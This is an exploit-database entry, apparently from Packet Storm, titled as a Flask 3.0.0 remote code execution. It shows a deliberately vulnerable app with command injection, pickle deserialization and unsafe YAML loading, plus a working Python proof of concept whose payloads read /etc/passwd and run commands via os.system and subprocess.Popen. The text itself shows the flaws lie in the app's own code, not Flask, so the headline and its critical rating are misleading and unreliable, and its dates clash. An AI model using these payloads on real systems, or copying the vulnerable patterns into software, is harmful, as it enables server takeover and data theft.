📄 Flask 3.0.0 Remote Code Execution_PACKETSTORM:212501

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

Flask version 3.0.0 suffers from multiple remote code execution vulnerabilities...

Visit Original Source

Basic Information

ID PACKETSTORM:212501

Published Dec 5, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: Flask 3.0.0 CookApp - Multiple Unauthenticated RCE
Vulnerabilities
# Date: 2024-12-05
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://flask.palletsprojects.com/
# Software Link: https://pypi.org/project/Flask/
# Version: 3.0.0
# Tested on: Linux (Ubuntu 22.04), Docker containers
# CVE: CVE-2025-55182
# Category: Remote Code Execution
# Platform: Python/Flask

1. Description
==============

A vulnerable Flask application (CookApp) contains multiple critical security
vulnerabilities that allow unauthenticated remote attackers to execute arbitrary
commands on the target system.

The application contains three distinct Remote Code Execution (RCE) vectors:

1. Command Injection via `/api/run` endpoint (CWE-78)
2. Pickle Deserialization RCE via `/api/load` endpoint (CWE-502)
3. YAML Deserialization RCE via `/api/yaml` endpoint (CWE-502)

CVSS 3.1 Score: 9.8 (CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

2. Vulnerable Code
==================

```python
# Vulnerable endpoint 1: Command Injection
@app.route("/api/run", methods=["POST"])
def run_cmd():
cmd = request.json.get("cmd", "whoami")
# VULNERABLE: shell=True with user input
output = subprocess.check_output(cmd, shell=True)
return {"output": output.decode()}

# Vulnerable endpoint 2: Pickle Deserialization
@app.route("/api/load", methods=["POST"])
def load():
data = request.get_data()
# VULNERABLE: pickle.loads() with untrusted data
recipe = pickle.loads(data)
return {"status": "loaded", "recipe": str(recipe)}

# Vulnerable endpoint 3: YAML Deserialization
@app.route("/api/yaml", methods=["POST"])
def import_yaml():
yaml_data = request.data.decode()
# VULNERABLE: yaml.load() instead of yaml.safe_load()
data = yaml.load(yaml_data, Loader=yaml.Loader)
return {"data": str(data)}

[+]PoC:

```py

#!/usr/bin/env python3
# https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/2025/flask-3.0.0-RCE/PoC.py
# nu11secur1ty
import requests
import pickle

target = "http://vulnerable-host:5000"

# 1. Command Injection (simplest)
resp = requests.post(f"{target}/api/run", json={"cmd": "cat /etc/passwd"})
print("Command Injection Output:", resp.json().get('output', ''))

# 2. Pickle RCE
class RCE:
def __reduce__(self):
import os
return (os.system, ("id",))

payload = pickle.dumps(RCE())
resp = requests.post(f"{target}/api/load", data=payload)
print("Pickle RCE Status:", resp.status_code)

# 3. YAML RCE
yaml_payload = """!!python/object/apply:subprocess.Popen
- ["sh", "-c", "whoami"]"""
resp = requests.post(f"{target}/api/yaml", data=yaml_payload)
print("YAML RCE Status:", resp.status_code)
```
### Demo:
[href](https://www.patreon.com/posts/flask-3-0-0-rce-145134394)

--

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

{
    "lastseen": "2025-12-05T18:52:32",
    "description": "Flask version 3.0.0 suffers from multiple remote code execution vulnerabilities...",
    "published": "2025-12-05T00:00:00",
    "modified": "2025-12-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Flask 3.0.0 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212501",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-55182"
    ],
    "sourceData": "# Exploit Title: Flask 3.0.0 CookApp - Multiple Unauthenticated RCE\n    Vulnerabilities\n    # Date: 2024-12-05\n    # Exploit Author: nu11secur1ty\n    # Vendor Homepage: https://flask.palletsprojects.com/\n    # Software Link: https://pypi.org/project/Flask/\n    # Version: 3.0.0\n    # Tested on: Linux (Ubuntu 22.04), Docker containers\n    # CVE: CVE-2025-55182\n    # Category: Remote Code Execution\n    # Platform: Python/Flask\n    \n    1. Description\n    ==============\n    \n    A vulnerable Flask application (CookApp) contains multiple critical security\n    vulnerabilities that allow unauthenticated remote attackers to execute arbitrary\n    commands on the target system.\n    \n    The application contains three distinct Remote Code Execution (RCE) vectors:\n    \n    1. Command Injection via `/api/run` endpoint (CWE-78)\n    2. Pickle Deserialization RCE via `/api/load` endpoint (CWE-502)\n    3. YAML Deserialization RCE via `/api/yaml` endpoint (CWE-502)\n    \n    CVSS 3.1 Score: 9.8 (CRITICAL)\n    Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    \n    2. Vulnerable Code\n    ==================\n    \n    ```python\n    # Vulnerable endpoint 1: Command Injection\n    @app.route(\"/api/run\", methods=[\"POST\"])\n    def run_cmd():\n        cmd = request.json.get(\"cmd\", \"whoami\")\n        # VULNERABLE: shell=True with user input\n        output = subprocess.check_output(cmd, shell=True)\n        return {\"output\": output.decode()}\n    \n    # Vulnerable endpoint 2: Pickle Deserialization\n    @app.route(\"/api/load\", methods=[\"POST\"])\n    def load():\n        data = request.get_data()\n        # VULNERABLE: pickle.loads() with untrusted data\n        recipe = pickle.loads(data)\n        return {\"status\": \"loaded\", \"recipe\": str(recipe)}\n    \n    # Vulnerable endpoint 3: YAML Deserialization\n    @app.route(\"/api/yaml\", methods=[\"POST\"])\n    def import_yaml():\n        yaml_data = request.data.decode()\n        # VULNERABLE: yaml.load() instead of yaml.safe_load()\n        data = yaml.load(yaml_data, Loader=yaml.Loader)\n        return {\"data\": str(data)}\n    \n    [+]PoC:\n    \n    ```py\n    \n    #!/usr/bin/env python3\n    # https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/2025/flask-3.0.0-RCE/PoC.py\n    # nu11secur1ty\n    import requests\n    import pickle\n    \n    target = \"http://vulnerable-host:5000\"\n    \n    # 1. Command Injection (simplest)\n    resp = requests.post(f\"{target}/api/run\", json={\"cmd\": \"cat /etc/passwd\"})\n    print(\"Command Injection Output:\", resp.json().get('output', ''))\n    \n    # 2. Pickle RCE\n    class RCE:\n        def __reduce__(self):\n            import os\n            return (os.system, (\"id\",))\n    \n    payload = pickle.dumps(RCE())\n    resp = requests.post(f\"{target}/api/load\", data=payload)\n    print(\"Pickle RCE Status:\", resp.status_code)\n    \n    # 3. YAML RCE\n    yaml_payload = \"\"\"!!python/object/apply:subprocess.Popen\n    - [\"sh\", \"-c\", \"whoami\"]\"\"\"\n    resp = requests.post(f\"{target}/api/yaml\", data=yaml_payload)\n    print(\"YAML RCE Status:\", resp.status_code)\n    ```\n    ### Demo:\n    [href](https://www.patreon.com/posts/flask-3-0-0-rce-145134394)\n    \n    \n    -- \n    \n    System Administrator - Infrastructure Engineer\n    Penetration Testing Engineer\n    Exploit developer at https://packetstorm.news/\n    https://cve.mitre.org/index.html\n    https://cxsecurity.com/ and https://www.exploit-db.com/\n    0day Exploit DataBase https://0day.today/\n    home page: https://www.asc3t1c-nu11secur1ty.com/\n    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n                              nu11secur1ty <http://nu11secur1ty.com/>",
    "sourceHref": "https://packetstorm.news/download/212501",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212501/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply